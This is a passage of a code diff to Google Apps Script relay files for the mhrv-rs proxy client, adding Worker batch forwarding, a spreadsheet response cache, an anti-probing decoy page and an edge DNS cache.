' + + ''; + +// ── Request Handlers ──────────────────────────────────────── + +function _decoyOrError(jsonBody) { + if (DIAGNOSTIC_MODE) return _json(jsonBody); + return ContentService + .createTextOutput(DECOY_HTML) + .setMimeType(ContentService.MimeType.HTML); +} + +function doPost(e) { + try { + // Fail-closed if either constant is still the template default. + // Without this, a forgotten edit would either accept the placeholder + // secret as valid auth or POST to a literal "CHANGE_ME" URL — both + // are silent failure modes a deploy might miss. Surface them loud. + if (AUTH_KEY === DEFAULT_AUTH_KEY) { + return _json({ e: "configure AUTH_KEY in Code.cfw.gs" }); + } + if (WORKER_URL === DEFAULT_WORKER_URL) { + return _json({ e: "configure WORKER_URL in Code.cfw.gs" }); + } + + var req = JSON.parse(e.postData.contents); + if (req.k !== AUTH_KEY) return _decoyOrError({ e: "unauthorized" }); + + if (Array.isArray(req.q)) return _doBatch(req.q); + return _doSingle(req); + } catch (err) { + return _decoyOrError({ e: String(err) }); + } +} + +function doGet(e) { + return ContentService + .createTextOutput(DECOY_HTML) + .setMimeType(ContentService.MimeType.HTML); +} + +// ── Worker Forwarding ────────────────────────────────────── + +/** + * Strip headers that must not be forwarded (hop-by-hop / Apps-Script- + * managed). Returns a fresh header map; the input is never mutated. + */ +function _scrubHeaders(rawHeaders) { + var out = {}; + if (rawHeaders && typeof rawHeaders === "object") { + for (var k in rawHeaders) { + if (rawHeaders.hasOwnProperty(k) && !SKIP_HEADERS[k.toLowerCase()]) { + out[k] = rawHeaders[k]; + } + } + } + return out; +} + +/** + * Normalize one request item into the shape the Worker expects. + * Used for both single and batch paths — single mode wraps this in + * `{k, ...item}`; batch mode wraps it in `{k, q: [item, ...]}`. + * Auth key is added at envelope level by callers, not per-item. + */ +function _normalizeItem(item) { + return { + u: item.u, + m: (item.m || "GET").toUpperCase(), + h: _scrubHeaders(item.h), + b: item.b || null, + ct: item.ct || null, + r: item.r !== false, + }; +} + +function _workerFetchOptions(payload) { + return { + url: WORKER_URL, + method: "post", + contentType: "application/json", + payload: JSON.stringify(payload), + muteHttpExceptions: true, + followRedirects: true, + validateHttpsCertificates: true, + }; +} + +// ── Single Request ───────────────────────────────────────── + +function _doSingle(req) { + if (!req.u || typeof req.u !== "string" || !req.u.match(/^https?:\/\//i)) { + return _json({ e: "bad url" }); + } + + var item = _normalizeItem(req); + var envelope = { + k: AUTH_KEY, + u: item.u, + m: item.m, + h: item.h, + b: item.b, + ct: item.ct, + r: item.r, + }; + var opts = _workerFetchOptions(envelope); + // muteHttpExceptions covers HTTP-level errors (4xx/5xx come back as + // a normal HTTPResponse). It does NOT cover network-level failures + // — DNS resolution failure, TLS handshake failure, connection + // timeout to *.workers.dev, etc. — those throw. Catch and surface + // them as `{e}` so the operator debugging "why isn't my deployment + // responding?" gets a useful signal instead of the doPost outer + // catch returning the decoy HTML page (which makes the deployment + // look like a bad-auth probe to the client). Auth has already + // passed at this point so the probe-defence argument doesn't apply. + var resp; + try { + resp = UrlFetchApp.fetch(opts.url, opts); + } catch (err) { + return _json({ e: "worker unreachable: " + String(err) }); + } + return _json(_parseWorkerJson(resp)); +} + +// ── Batch Request ────────────────────────────────────────── + +/** + * Forward a batch to the Worker, chunking when needed. Each chunk + * becomes ONE POST to the Worker; the Worker fans out across the URLs + * in the chunk via Promise.all and returns `{q: [...]}` in the same + * order. Multiple chunks fire in parallel via UrlFetchApp.fetchAll. + * + * Quota cost: ceil(N / WORKER_BATCH_CHUNK) GAS UrlFetchApp calls for + * an N-URL batch. For typical mhrv-rs batches of 5-30 URLs this is + * exactly 1 call (vs N under standard Code.gs's fetchAll). Larger + * batches gracefully degrade to a few calls instead of failing under + * the Worker's own MAX_BATCH_SIZE soft cap. + * + * Bad-URL items are filtered locally so the Worker only sees valid + * inputs, then re-interleaved into the result array in original order + * so mhrv-rs's batch-index assumptions hold. + */ +function _doBatch(items) { + var validItems = []; + var errorMap = {}; + + for (var i = 0; i < items.length; i++) { + var item = items[i]; + if (!item.u || typeof item.u !== "string" || !item.u.match(/^https?:\/\//i)) { + errorMap[i] = "bad url"; + continue; + } + validItems.push(_normalizeItem(item)); + } + + var workerResults = []; + if (validItems.length > 0) { + // Split into chunks ≤ WORKER_BATCH_CHUNK so each Worker call stays + // under the Worker's MAX_BATCH_SIZE cap. Single-chunk fast path + // avoids the fetchAll overhead for the common case. + var chunks = []; + for (var c = 0; c < validItems.length; c += WORKER_BATCH_CHUNK) { + chunks.push(validItems.slice(c, c + WORKER_BATCH_CHUNK)); + } + + var fetchOpts = chunks.map(function(chunk) { + return _workerFetchOptions({ k: AUTH_KEY, q: chunk }); + }); + + // muteHttpExceptions covers HTTP-level errors. Network-level + // failures (DNS, TLS, connection timeout to *.workers.dev) still + // throw — catch and convert to per-chunk `{e}` errors that get + // spread across each chunk's slots. mhrv-rs's per-item retry + // then handles them individually instead of getting the decoy + // HTML page from the doPost outer catch. See _doSingle for why + // the probe-defence argument doesn't apply post-auth. + var responses; + try { + if (fetchOpts.length === 1) { + responses = [UrlFetchApp.fetch(fetchOpts[0].url, fetchOpts[0])]; + } else { + responses = UrlFetchApp.fetchAll(fetchOpts); + } + } catch (err) { + var unreachable = { e: "worker unreachable: " + String(err) }; + for (var u = 0; u < validItems.length; u++) workerResults.push(unreachable); + // Skip the per-response loop below by returning early through the + // reassembly code path. + responses = null; + } + + for (var r = 0; responses && r < responses.length; r++) { + var parsed = _parseWorkerJson(responses[r]); + if (parsed && Array.isArray(parsed.q)) { + for (var k = 0; k < parsed.q.length; k++) { + workerResults.push(parsed.q[k]); + } + } else { + // Per-chunk failure (worker error, parse failure, auth, etc). + // Spread the same error to every slot in this chunk so mhrv-rs + // retries each item individually rather than masking the + // failure. Other chunks are unaffected. + var slotErr = (parsed && parsed.e) + ? { e: parsed.e } + : { e: "worker batch failure" }; + for (var s = 0; s < chunks[r].length; s++) workerResults.push(slotErr); + } + } + } + + // Reassemble into the original order: validated slots get their + // worker result; invalid slots get their pre-flight error. + var results = []; + var wi = 0; + for (var j = 0; j < items.length; j++) { + if (errorMap.hasOwnProperty(j)) { + results.push({ e: errorMap[j] }); + } else { + results.push(workerResults[wi++] || { e: "missing worker response" }); + } + } + return _json({ q: results }); +} + +// ── Worker response handling ─────────────────────────────── + +/** + * Parse the Worker's JSON envelope. Worker errors come back as + * `{e: "..."}` — pass them through to the client unchanged so mhrv-rs + * sees the same error-shape it would for a direct-fetch failure in + * Code.gs. On HTTP errors from the Worker itself (auth failure, 5xx, + * etc.), wrap into `{e}` so the client gets a useful message instead + * of a parse-failure. + */ +function _parseWorkerJson(resp) { + var code = resp.getResponseCode(); + var text = resp.getContentText(); + try { + return JSON.parse(text); + } catch (err) { + return { e: "worker " + code + ": " + (text.length > 200 ? text.substring(0, 200) + "…" : text) }; + } +} + +function _json(obj) { + return ContentService.createTextOutput(JSON.stringify(obj)).setMimeType( + ContentService.MimeType.JSON + ); +} diff --git a/assets/apps_script/Code.gs b/assets/apps_script/Code.gs index 8c2acecd..3cc091db 100644 --- a/assets/apps_script/Code.gs +++ b/assets/apps_script/Code.gs @@ -6,18 +6,61 @@ * 2. Batch: POST { k, q: [{m,u,h,b,ct,r}, ...] } → { q: [{s,h,b}, ...] } * Uses UrlFetchApp.fetchAll() — all URLs fetched IN PARALLEL. * + * OPTIONAL SPREADSHEET-BACKED RESPONSE CACHE: + * Set CACHE_SPREADSHEET_ID to a valid Google Sheet ID (must be owned by + * the same account). When enabled, public GET requests are stored in the + * sheet and served from there on repeat visits, reducing UrlFetchApp + * quota consumption. The cache is Vary-aware (Accept-Encoding and + * Accept-Language are hashed into the compound cache key). Leave + * CACHE_SPREADSHEET_ID as-is to disable caching entirely — zero overhead. + * * DEPLOYMENT: * 1. Go to https://script.google.com → New project * 2. Delete the default code, paste THIS entire file - * 3. Click Deploy → New deployment - * 4. Type: Web app | Execute as: Me | Who has access: Anyone - * 5. Copy the Deployment ID into config.json as "script_id" + * 3. Change AUTH_KEY below to your own secret + * 4. (Optional) Set CACHE_SPREADSHEET_ID to enable caching + * 5. Click Deploy → New deployment + * 6. Type: Web app | Execute as: Me | Who has access: Anyone + * 7. Copy the Deployment ID into config.json as "script_id" * * CHANGE THE AUTH KEY BELOW TO YOUR OWN SECRET! */ const AUTH_KEY = "CHANGE_ME_TO_A_STRONG_SECRET"; +// Active-probing defense. When false (production default), bad AUTH_KEY +// requests get a decoy HTML page that looks like a placeholder Apps +// Script web app instead of the JSON `{"e":"unauthorized"}` body. This +// makes the deployment indistinguishable from a forgotten-but-public +// Apps Script project to active scanners that POST malformed payloads +// looking for proxy endpoints. +// +// Set to `true` during initial setup if a misconfigured client is +// hitting "unauthorized" and you want the explicit JSON error to debug +// — then flip back to false before the deployment is widely shared. +// (Inspired by #365 Section 3, mhrv-rs v1.8.0+.) +const DIAGNOSTIC_MODE = false; + +// ── Optional Spreadsheet Cache ────────────────────────────── +// Set to a valid Spreadsheet ID to enable response caching. +// Leave as-is to disable caching entirely (zero overhead). +const CACHE_SPREADSHEET_ID = "CHANGE_ME_TO_CACHE_SPREADSHEET_ID"; +const CACHE_SHEET_NAME = "RelayCache"; +const CACHE_META_SHEET_NAME = "RelayMeta"; +const CACHE_META_CURSOR_CELL = "A1"; + +// ── Cache Tuning ──────────────────────────────────────────── +const CACHE_MAX_ROWS = 5000; // circular buffer capacity +const CACHE_MAX_BODY_BYTES = 35000; // skip responses larger than ~35 KB +const CACHE_DEFAULT_TTL_SECONDS = 86400; // 24-hour fallback when no Cache-Control + +// ── Vary-Aware Cache Key ──────────────────────────────────── +// These request headers are hashed into the compound cache key +// alongside the URL so that responses with different encodings +// or languages never collide in the cache. Covers ~95 % of +// real-world Vary usage without inspecting the response. +const VARY_KEY_HEADERS = ["accept-encoding", "accept-language"]; + // Keep browser capability headers (sec-ch-ua*, sec-fetch-*) intact. // Some modern apps, notably Google Meet, use them for browser gating. const SKIP_HEADERS = { @@ -26,10 +69,33 @@ const SKIP_HEADERS = { "priority": 1, te: 1, }; +// Headers that disqualify a request from the cache path. +const CACHE_BUSTING_HEADERS = { + authorization: 1, cookie: 1, "x-api-key": 1, + "proxy-authorization": 1, "set-cookie": 1, +}; + +// HTML body for the bad-auth decoy. Mimics a minimal Apps Script-style +// placeholder page — no proxy-shaped JSON, nothing distinctive enough +// for a probe to fingerprint as a tunnel endpoint. +const DECOY_HTML = + 'Web App' + + '

The script completed but did not return anything.

' + + ''; + +// ── Request Handlers ──────────────────────────────────────── + +function _decoyOrError(jsonBody) { + if (DIAGNOSTIC_MODE) return _json(jsonBody); + return ContentService + .createTextOutput(DECOY_HTML) + .setMimeType(ContentService.MimeType.HTML); +} + function doPost(e) { try { var req = JSON.parse(e.postData.contents); - if (req.k !== AUTH_KEY) return _json({ e: "unauthorized" }); + if (req.k !== AUTH_KEY) return _decoyOrError({ e: "unauthorized" }); // Batch mode: { k, q: [...] } if (Array.isArray(req.q)) return _doBatch(req.q); @@ -37,14 +103,58 @@ function doPost(e) { // Single mode return _doSingle(req); } catch (err) { - return _json({ e: String(err) }); + // Parse failures of the request body are also probe-shaped — a real + // mhrv-rs client never sends invalid JSON. Decoy for the same reason. + return _decoyOrError({ e: String(err) }); } } +// `doGet` is what active scanners hit first (HTTP GET probes are cheaper +// than POSTs). Apps Script defaults to a "Script function not found" page +// here which is a fine-enough decoy on its own, but explicitly returning +// the same harmless placeholder makes the response identical to the +// bad-auth POST decoy — one less fingerprint vector. +function doGet(e) { + return ContentService + .createTextOutput(DECOY_HTML) + .setMimeType(ContentService.MimeType.HTML); +} + +// ── Single Request ───────────────────────────────────────── + function _doSingle(req) { if (!req.u || typeof req.u !== "string" || !req.u.match(/^https?:\/\//i)) { return _json({ e: "bad url" }); } + + // ── Optional cache path ──────────────────────────────── + // Only entered when CACHE_SPREADSHEET_ID is configured and + // the request qualifies as a public, cachable GET. + if (_canUseCache(req)) { + var cached = _getFromCache(req.u, req.h); + if (cached) { + return _json({ + s: cached.status, + h: JSON.parse(cached.headers), + b: cached.body, + cached: true, + }); + } + + var fetchResult = _fetchAndCache(req.u, req.h); + if (fetchResult) { + return _json({ + s: fetchResult.status, + h: JSON.parse(fetchResult.headers), + b: fetchResult.body, + cached: false, + }); + } + // If _fetchAndCache returns null (spreadsheet unavailable), + // fall through to the normal relay path below. + } + + // ── Normal relay (cache disabled or unavailable) ──────── var opts = _buildOpts(req); var resp = UrlFetchApp.fetch(req.u, opts); return _json({ @@ -54,6 +164,8 @@ function _doSingle(req) { }); } +// ── Batch Request ────────────────────────────────────────── + function _doBatch(items) { var fetchArgs = []; var errorMap = {}; @@ -92,6 +204,8 @@ function _doBatch(items) { return _json({ q: results }); } +// ── Request Building ─────────────────────────────────────── + function _buildOpts(req) { var opts = { method: (req.m || "GET").toLowerCase(), @@ -139,3 +253,404 @@ function _json(obj) { ContentService.MimeType.JSON ); } + +// ═══════════════════════════════════════════════════════════ +// SPREADSHEET CACHE — SHEET MANAGEMENT +// ═══════════════════════════════════════════════════════════ + +function _initCacheSheet() { + if (CACHE_SPREADSHEET_ID === "CHANGE_ME_TO_CACHE_SPREADSHEET_ID") { + return null; + } + try { + var ss = SpreadsheetApp.openById(CACHE_SPREADSHEET_ID); + var sheet = ss.getSheetByName(CACHE_SHEET_NAME); + if (!sheet) { + sheet = ss.insertSheet(CACHE_SHEET_NAME); + // Schema: URL_Hash | URL | Status | Headers | Body | Timestamp | Expires_At + sheet.getRange(1, 1, 1, 7).setValues([[ + "URL_Hash", "URL", "Status", "Headers", "Body", "Timestamp", "Expires_At" + ]]); + } + return sheet; + } catch (e) { + return null; + } +} + +function _getMetaSheet() { + if (CACHE_SPREADSHEET_ID === "CHANGE_ME_TO_CACHE_SPREADSHEET_ID") { + return null; + } + try { + var ss = SpreadsheetApp.openById(CACHE_SPREADSHEET_ID); + var sheet = ss.getSheetByName(CACHE_META_SHEET_NAME); + if (!sheet) { + sheet = ss.insertSheet(CACHE_META_SHEET_NAME); + sheet.getRange(CACHE_META_CURSOR_CELL).setValue(2); + sheet.hideSheet(); + } + return sheet; + } catch (e) { + return null; + } +} + +function _getNextCursor(sheet, metaSheet) { + var cursorRange = metaSheet.getRange(CACHE_META_CURSOR_CELL); + var cursor = cursorRange.getValue(); + if (typeof cursor !== "number" || cursor < 2) cursor = 2; + + var totalRows = sheet.getDataRange().getNumRows(); + + if (totalRows < CACHE_MAX_ROWS + 1) { + return totalRows + 1; + } + + return cursor; +} + +function _advanceCursor(metaSheet, currentRow) { + var nextRow = currentRow + 1; + if (nextRow > CACHE_MAX_ROWS + 1) nextRow = 2; + metaSheet.getRange(CACHE_META_CURSOR_CELL).setValue(nextRow); +} + +function _ensureRowsAllocated(sheet) { + var totalRows = sheet.getDataRange().getNumRows(); + if (totalRows < CACHE_MAX_ROWS + 1) { + var needed = CACHE_MAX_ROWS + 1 - totalRows; + sheet.insertRowsAfter(totalRows, needed); + } +} + +// ═══════════════════════════════════════════════════════════ +// SPREADSHEET CACHE — VARY-AWARE COMPOUND KEY +// ═══════════════════════════════════════════════════════════ + +/** + * Case-insensitive header lookup. + * HTTP header names are case-insensitive per RFC 7230 § 3.2. + */ +function _getHeaderCaseInsensitive(headers, targetKey) { + var target = targetKey.toLowerCase(); + for (var k in headers) { + if (headers.hasOwnProperty(k) && k.toLowerCase() === target) { + return headers[k]; + } + } + return null; +} + +/** + * Compute a compound cache key: + * MD5(URL | header1:value1 | header2:value2 | ...) + * + * Instead of reading the response Vary header (which would require + * fetching first — circular), we preemptively include the request + * headers that are known to cause response variation. This handles + * Vary: Accept-Encoding and Vary: Accept-Language without ever + * inspecting the response. + * + * Values are lowercased and whitespace-stripped so semantically + * identical requests from different clients produce the same hash. + * Missing and empty headers both map to "" (same semantic). + */ +function _getCacheKey(url, reqHeaders) { + var parts = [url]; + + if (reqHeaders && typeof reqHeaders === "object") { + for (var i = 0; i < VARY_KEY_HEADERS.length; i++) { + var headerName = VARY_KEY_HEADERS[i]; + var rawValue = _getHeaderCaseInsensitive(reqHeaders, headerName); + + if (rawValue && String(rawValue).trim() !== "") { + parts.push(headerName + ":" + rawValue.toLowerCase().replace(/\s/g, "")); + } else { + parts.push(headerName + ":"); + } + } + } else { + for (var j = 0; j < VARY_KEY_HEADERS.length; j++) { + parts.push(VARY_KEY_HEADERS[j] + ":"); + } + } + + var compoundKey = parts.join("|"); + return _md5Hex(compoundKey); +} + +function _md5Hex(input) { + var rawHash = Utilities.computeDigest(Utilities.DigestAlgorithm.MD5, input); + return rawHash + .map(function (byte) { + var v = (byte < 0) ? 256 + byte : byte; + return ("0" + v.toString(16)).slice(-2); + }) + .join(""); +} + +// ═══════════════════════════════════════════════════════════ +// SPREADSHEET CACHE — CORE LOGIC +// ═══════════════════════════════════════════════════════════ + +/** + * Returns true if the request is eligible for the cache path: + * public GET, no body, no auth/cookie headers, cache configured. + */ +function _canUseCache(req) { + if ((req.m || "GET") !== "GET") return false; + if (req.b) return false; + if (!req.u || !req.u.match(/^https?:\/\//i)) return false; + if (CACHE_SPREADSHEET_ID === "CHANGE_ME_TO_CACHE_SPREADSHEET_ID") return false; + + if (req.h && typeof req.h === "object") { + for (var k in req.h) { + if (req.h.hasOwnProperty(k) && CACHE_BUSTING_HEADERS[k.toLowerCase()]) { + return false; + } + } + } + + return true; +} + +/** + * Extract max-age (seconds) from a Cache-Control header value. + * Returns 0 if the directive forbids caching (no-cache / no-store / + * private). Falls back to CACHE_DEFAULT_TTL_SECONDS when no header + * is present. Clamped to [60, 2592000] (1 min – 30 days). + */ +function _parseMaxAge(cacheControlHeader) { + if (!cacheControlHeader) return CACHE_DEFAULT_TTL_SECONDS; + + var lower = cacheControlHeader.toLowerCase(); + + if ( + lower.indexOf("no-cache") !== -1 || + lower.indexOf("no-store") !== -1 || + lower.indexOf("private") !== -1 + ) { + return 0; + } + + var match = lower.match(/max-age=(\d+)/); + if (match) { + var ttl = parseInt(match[1], 10); + return Math.max(60, Math.min(ttl, 2592000)); + } + + return CACHE_DEFAULT_TTL_SECONDS; +} + +/** + * Rewrite time-sensitive headers so the client sees accurate + * Date, Age, and Cache-Control values reflecting cache age. + */ +function _refreshCachedHeaders(headersJson, timestamp) { + var headers = JSON.parse(headersJson); + var cachedAt = new Date(timestamp); + var now = new Date(); + var ageSeconds = Math.floor((now.getTime() - cachedAt.getTime()) / 1000); + + if (ageSeconds < 0) ageSeconds = 0; + + headers["Date"] = now.toUTCString(); + headers["Age"] = String(ageSeconds); + + var originalCc = headers["Cache-Control"] || headers["cache-control"]; + if (originalCc) { + headers["X-Original-Cache-Control"] = originalCc; + } + + var remainingMaxAge = Math.max(0, _parseMaxAge(originalCc) - ageSeconds); + headers["Cache-Control"] = "public, max-age=" + remainingMaxAge; + + headers["X-Cache"] = "HIT from relay-spreadsheet"; + headers["X-Cached-At"] = cachedAt.toUTCString(); + + return JSON.stringify(headers); +} + +/** + * Retrieve a cached response by compound cache key. + * Uses TextFinder for O(log n) lookup. Skips expired entries. + * Returns null on miss, expired entry, or unavailable sheet. + */ +function _getFromCache(url, reqHeaders) { + var sheet = _initCacheSheet(); + if (!sheet) return null; + + var hash = _getCacheKey(url, reqHeaders); + var finder = sheet.createTextFinder(hash).matchEntireCell(true); + var found = finder.findNext(); + + if (found) { + var row = sheet.getRange(found.getRow(), 1, 1, 7).getValues()[0]; + + var expiresAt = row[6]; + if (expiresAt && expiresAt instanceof Date && expiresAt < new Date()) { + return null; + } + + return { + status: row[2], + headers: _refreshCachedHeaders(row[3], row[5]), + body: row[4], + }; + } + return null; +} + +/** + * Fetch a URL and store the response in the spreadsheet cache + * using a circular buffer (O(1) writes). Skips storage when the + * encoded body exceeds CACHE_MAX_BODY_BYTES or when Cache-Control + * forbids caching. Returns the fetch result regardless. + */ +function _fetchAndCache(url, reqHeaders) { + var sheet = _initCacheSheet(); + if (!sheet) return null; + + try { + var response = UrlFetchApp.fetch(url, { muteHttpExceptions: true }); + var status = response.getResponseCode(); + var headers = _respHeaders(response); + var body = Utilities.base64Encode(response.getContent()); + + // Cell-size safety gate + if (body.length > CACHE_MAX_BODY_BYTES) { + return { status: status, headers: JSON.stringify(headers), body: body }; + } + + // TTL extraction + var cacheControl = + headers["Cache-Control"] || headers["cache-control"] || null; + var ttlSeconds = _parseMaxAge(cacheControl); + + if (ttlSeconds === 0) { + return { status: status, headers: JSON.stringify(headers), body: body }; + } + + var hash = _getCacheKey(url, reqHeaders); + var timestamp = new Date(); + var expiresAt = new Date(timestamp.getTime() + ttlSeconds * 1000); + + // Safety: fallback if Date math produces invalid result + if (isNaN(expiresAt.getTime())) { + expiresAt = new Date(timestamp.getTime() + CACHE_DEFAULT_TTL_SECONDS * 1000); + } + + var rowData = [ + hash, + url, + status, + JSON.stringify(headers), + body, + timestamp.toISOString(), + expiresAt, + ]; + + // Circular buffer write (O(1)) + var metaSheet = _getMetaSheet(); + if (metaSheet) { + _ensureRowsAllocated(sheet); + var writeRow = _getNextCursor(sheet, metaSheet); + sheet.getRange(writeRow, 1, 1, 7).setValues([rowData]); + _advanceCursor(metaSheet, writeRow); + } else { + // Fallback: simple append if meta sheet is unavailable + sheet.appendRow(rowData); + } + + return { status: status, headers: JSON.stringify(headers), body: body }; + } catch (e) { + return null; + } +} + +// ═══════════════════════════════════════════════════════════ +// SPREADSHEET CACHE — DIAGNOSTICS +// ═══════════════════════════════════════════════════════════ + +function getCacheStats() { + var sheet = _initCacheSheet(); + if (!sheet) { + console.log("Cache is not enabled or spreadsheet unavailable."); + return; + } + + var data = sheet.getDataRange().getValues(); + var totalEntries = data.length - 1; + var now = new Date(); + var expiredCount = 0; + + for (var i = 1; i < data.length; i++) { + var expiresAt = data[i][6]; + if (expiresAt && expiresAt instanceof Date && expiresAt < now) { + expiredCount++; + } + } + + var metaSheet = _getMetaSheet(); + var cursorInfo = "N/A"; + if (metaSheet) { + cursorInfo = String(metaSheet.getRange(CACHE_META_CURSOR_CELL).getValue()); + } + + console.log("=== CACHE STATS ==="); + console.log("Total rows used: " + totalEntries + " / " + CACHE_MAX_ROWS); + console.log("Active entries: " + (totalEntries - expiredCount)); + console.log("Expired entries: " + expiredCount); + console.log("Cursor position: " + cursorInfo); + console.log("Max body size: " + CACHE_MAX_BODY_BYTES + " chars"); + console.log("Default TTL: " + CACHE_DEFAULT_TTL_SECONDS + " sec"); + console.log("Vary key headers: " + VARY_KEY_HEADERS.join(", ")); + if (totalEntries > 0) { + console.log("Oldest entry: " + data[1][5]); + console.log("Newest entry: " + data[data.length - 1][5]); + } +} + +function clearExpiredCache() { + var sheet = _initCacheSheet(); + if (!sheet) { + console.log("Cache is not enabled."); + return; + } + + var data = sheet.getDataRange().getValues(); + var now = new Date(); + var rowsToClear = []; + + for (var i = 1; i < data.length; i++) { + var expiresAt = data[i][6]; + if (expiresAt && expiresAt instanceof Date && expiresAt < now) { + rowsToClear.push(i + 1); + } + } + + for (var j = 0; j < rowsToClear.length; j++) { + sheet.getRange(rowsToClear[j], 1, 1, 7).clearContent(); + } + + console.log("Cleared " + rowsToClear.length + " expired entries (" + + (data.length - 1 - rowsToClear.length) + " remaining)."); +} + +function clearEntireCache() { + var sheet = _initCacheSheet(); + if (sheet) { + var totalRows = sheet.getDataRange().getNumRows(); + if (totalRows > 1) { + sheet.getRange(2, 1, totalRows - 1, 7).clearContent(); + } + } + + var metaSheet = _getMetaSheet(); + if (metaSheet) { + metaSheet.getRange(CACHE_META_CURSOR_CELL).setValue(2); + } + + console.log("Cache wiped. Cursor reset to row 2."); +} diff --git a/assets/apps_script/CodeFull.gs b/assets/apps_script/CodeFull.gs index 77b2a5e5..e47c64ff 100644 --- a/assets/apps_script/CodeFull.gs +++ b/assets/apps_script/CodeFull.gs @@ -16,18 +16,86 @@ const AUTH_KEY = "CHANGE_ME_TO_A_STRONG_SECRET"; const TUNNEL_SERVER_URL = "https://YOUR_TUNNEL_NODE_URL"; const TUNNEL_AUTH_KEY = "YOUR_TUNNEL_AUTH_KEY"; +// Active-probing defense. When false (production default), bad AUTH_KEY +// requests get a decoy HTML page that looks like a placeholder Apps +// Script web app instead of the JSON `{"e":"unauthorized"}` body. This +// makes the deployment indistinguishable from a forgotten-but-public +// Apps Script project to active scanners that POST malformed payloads +// looking for proxy endpoints. +// +// Set to `true` during initial setup if a misconfigured client is +// hitting "unauthorized" and you want the explicit JSON error to debug +// — then flip back to false before the deployment is widely shared. +// (Inspired by #365 Section 3, mhrv-rs v1.8.0+.) +const DIAGNOSTIC_MODE = false; + const SKIP_HEADERS = { host: 1, connection: 1, "content-length": 1, "transfer-encoding": 1, "proxy-connection": 1, "proxy-authorization": 1, "priority": 1, te: 1, }; +// HTML body for the bad-auth decoy. Mimics a minimal Apps Script-style +// placeholder page — no proxy-shaped JSON, nothing distinctive enough +// for a probe to fingerprint as a tunnel endpoint. +const DECOY_HTML = + 'Web App' + + '

The script completed but did not return anything.

' + + ''; + +function _decoyOrError(jsonBody) { + if (DIAGNOSTIC_MODE) return _json(jsonBody); + return ContentService + .createTextOutput(DECOY_HTML) + .setMimeType(ContentService.MimeType.HTML); +} + +// Edge DNS cache. Plain UDP/53 queries normally traverse the full +// client → GAS → tunnel-node → public resolver path, and the +// trans-Atlantic round-trip dominates first-hop latency. When +// ENABLE_EDGE_DNS_CACHE is true, _doTunnelBatch intercepts udp_open +// ops with port=53, serves the reply from CacheService on a hit, or +// does its own DoH lookup on a miss from inside Google's network. +// Cache hits never reach the tunnel-node. +// +// Safety property: any failure (parse error, DoH unreachable, +// CacheService error, refused qtype) returns null from _edgeDnsTry, +// and the op falls through to the existing tunnel-node forward path. +// Set false to disable and forward all DNS through the tunnel as +// before. +const ENABLE_EDGE_DNS_CACHE = true; + +// DoH endpoints tried in order on cache miss. All speak RFC 8484 +// over GET. Apps Script's outbound network peers well to all three. +const EDGE_DNS_RESOLVERS = [ + "https://1.1.1.1/dns-query", + "https://dns.google/dns-query", + "https://dns.quad9.net/dns-query", +]; + +// CacheService bounds: 6h max TTL, 100KB per value, ~1000 keys, 250-char keys. +const EDGE_DNS_MIN_TTL_S = 30; +const EDGE_DNS_MAX_TTL_S = 21600; // 6h CacheService ceiling +// Used for NXDOMAIN/SERVFAIL and the rare "no answer + no SOA in authority" +// case. NOERROR/NODATA replies normally carry an SOA, and per RFC 2308 §5 +// we honor that SOA's TTL via _dnsMinTtl (the positive path). +const EDGE_DNS_NEG_TTL_S = 45; +const EDGE_DNS_CACHE_PREFIX = "edns:"; +// CacheService rejects keys longer than 250 chars. Names approaching the +// 253-char DNS limit + prefix + qtype digits can exceed that, so we bail +// before issuing the get/put. The op falls through to the tunnel-node. +const EDGE_DNS_MAX_KEY_LEN = 240; + +// qtypes we refuse to cache and pass through to the tunnel-node: +// 255 = ANY (resolvers handle it more correctly than we would) +const EDGE_DNS_REFUSE_QTYPES = { 255: 1 }; + // ========================== Entry point ========================== function doPost(e) { try { var req = JSON.parse(e.postData.contents); - if (req.k !== AUTH_KEY) return _json({ e: "unauthorized" }); + if (req.k !== AUTH_KEY) return _decoyOrError({ e: "unauthorized" }); // Tunnel mode if (req.t) return _doTunnel(req); @@ -38,7 +106,9 @@ function doPost(e) { // Single relay mode return _doSingle(req); } catch (err) { - return _json({ e: String(err) }); + // Parse failures of the request body are also probe-shaped — a real + // mhrv-rs client never sends invalid JSON. Decoy for the same reason. + return _decoyOrError({ e: String(err) }); } } @@ -96,29 +166,102 @@ function _doTunnel(req) { .setMimeType(ContentService.MimeType.JSON); } -// Batch tunnel: forward all ops in one request to /tunnel/batch +// Batch tunnel: forward all ops in one request to /tunnel/batch. +// When ENABLE_EDGE_DNS_CACHE is true, udp_open/port=53 ops are served +// locally where possible and only the remainder is forwarded. function _doTunnelBatch(req) { - var payload = { - k: TUNNEL_AUTH_KEY, - ops: req.ops || [], - }; + var ops = (req && req.ops) || []; + + // Feature off: byte-identical to the pre-feature behavior. + if (!ENABLE_EDGE_DNS_CACHE) { + return _doTunnelBatchForward(ops); + } + + var results = new Array(ops.length); // sparse: filled by edge-DNS hits + var forwardOps = []; + var forwardIdx = []; + + for (var i = 0; i < ops.length; i++) { + var op = ops[i]; + if (op && op.op === "udp_open" && op.port === 53 && op.d) { + var synth = _edgeDnsTry(op); + if (synth) { + results[i] = synth; + continue; + } + } + forwardOps.push(op); + forwardIdx.push(i); + } + + // All ops served locally — no tunnel-node round-trip. + if (forwardOps.length === 0) { + return _json({ r: results }); + } + + // Nothing was served locally — forward verbatim, no splice needed. + if (forwardOps.length === ops.length) { + return _doTunnelBatchForward(ops); + } + + // Partial: forward the un-served ops and splice results back in place. + var resp = _doTunnelBatchFetch(forwardOps); + if (resp.error) return _json({ e: resp.error }); + if (resp.r.length !== forwardOps.length) { + // Tunnel-node version skew — bail explicitly rather than silently + // route TCP responses to UDP sids. + return _json({ e: "tunnel batch length mismatch" }); + } + return _json({ r: _spliceTunnelResults(forwardIdx, resp.r, results) }); +} +// Verbatim forward: no splice, response passed through unchanged. +function _doTunnelBatchForward(ops) { var resp = UrlFetchApp.fetch(TUNNEL_SERVER_URL + "/tunnel/batch", { method: "post", contentType: "application/json", - payload: JSON.stringify(payload), + payload: JSON.stringify({ k: TUNNEL_AUTH_KEY, ops: ops }), muteHttpExceptions: true, followRedirects: true, }); - if (resp.getResponseCode() !== 200) { return _json({ e: "tunnel batch HTTP " + resp.getResponseCode() }); } - return ContentService.createTextOutput(resp.getContentText()) .setMimeType(ContentService.MimeType.JSON); } +// Forward + parse for the splice path. Returns { r:[...] } on success or +// { error: "..." } on any failure. +function _doTunnelBatchFetch(ops) { + var resp = UrlFetchApp.fetch(TUNNEL_SERVER_URL + "/tunnel/batch", { + method: "post", + contentType: "application/json", + payload: JSON.stringify({ k: 